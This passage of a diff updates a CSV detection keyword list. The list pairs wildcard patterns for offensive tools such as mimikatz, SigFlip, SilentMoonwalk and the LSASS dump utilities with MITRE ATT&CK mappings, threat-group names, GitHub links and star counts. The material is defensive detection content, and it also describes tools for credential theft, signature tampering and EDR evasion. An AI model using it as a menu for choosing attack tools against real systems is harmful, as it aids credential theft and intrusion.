plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sid::query*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sigflip*/Bof/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.exe -*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigFlip.WinTrustData*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigInject *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*Sigloader *.dll*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*SigLoader/sigloader.c*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*signal2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Signal-Labs/NtdllUnpatcher*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" -"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","2","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" +"*SigPloit*","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","3","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" "*sigthief.exe.manifest*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*sigthief.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*SigThief-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*sigwhatever.exe*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*silenthound.py*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*SilentHound-main*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" -"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*SilentMoonwalk.cpp*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.sln*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk-master*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" -"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" 